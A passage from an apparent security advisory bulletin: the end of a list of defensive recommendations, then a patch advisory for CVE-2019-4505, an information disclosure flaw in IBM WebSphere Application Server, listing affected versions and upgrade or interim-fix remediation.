3. Ensure the Web Application Firewall (WAF) is configured to inspect HTTP POST responses on the web application server.
4. Review, in a timely manner, the source code of local or remote (linked) JavaScript libraries used by the web application.
5. Follow a zero-trust approach while assessing the risk associated with third-party JavaScript libraries and services.
6. Subscription to intelligence-driven Cyber Risk Management and Managed Security Services is strongly recommended.
7. Block the listed IP/domain on security devices.
8. Block the listed hash where it is not detected by your antivirus program or not known to your antivirus vendor.

SECURITY PATCH ADVISORY

Sensitive Information Disclosure Vulnerability (CVE-2019-4505) found in IBM WebSphere Application Server

Date: September 21, 2019
Severity: High

IMPACT
Successful exploitation of this vulnerability allows remote attackers to construct a specially crafted URL to obtain sensitive information from the server and to view any file in a certain directory of the server.

INTRODUCTION
A Sensitive Information Disclosure Vulnerability (CVE-2019-4505) has been found in IBM WebSphere Application Server versions 9.0, 8.5, 8.0 and 7.0. Successful exploitation of this vulnerability in IBM WebSphere Application Server (Network Deployment) allows remote attackers to construct a specially crafted URL to obtain sensitive information from the server, and also to view any file in a certain directory of the server.

The vulnerability poses a serious risk of unauthorized disclosure of sensitive information, which can be used to plan a targeted attack against the web services hosted on the vulnerable IBM WebSphere Application Server (Network Deployment).

We strongly recommend that our customers upgrade IBM WebSphere Application Server (Traditional and Hypervisor Editions) versions 9.0.0.0 through 9.0.5.0 to the latest version, 9.0.5.1, and versions 8.5.0.0 through 8.5.5.16 to the latest version, 8.5.5.17, or apply interim fix PH14796.

We also bring to your notice that IBM WebSphere Virtual Enterprise v7 and v8 are no longer supported; it is recommended to upgrade to a fixed, supported version of the product. For IBM WebSphere Virtual Enterprise v7, apply interim fix PH14796. For IBM WebSphere Virtual Enterprise v8, contact IBM Customer Support for further assistance.

AFFECTED PRODUCTS
• WebSphere Application Server Version 9.0
• WebSphere Application Server Version 8.5
• WebSphere Virtual Enterprise Version 8.0
• WebSphere Virtual Enterprise Version 7.0

REMEDIATION
1. Upgrade IBM WebSphere Application Server (Traditional and Hypervisor Editions) versions 9.0.0.0 through 9.0.5.0 to the latest version, 9.0.5.1, or apply interim fix PH14796.
2. Upgrade IBM WebSphere Application Server (Traditional and Hypervisor Editions) versions 8.5.0.0 through 8.5.5.16 to the latest version, 8.5.5.17, or apply interim fix PH14796.
3. Apply interim fix PH14796 on IBM WebSphere Virtual Enterprise v7.

READ: Information disclosure in WebSphere Application Server ND (CVE-2019-4505)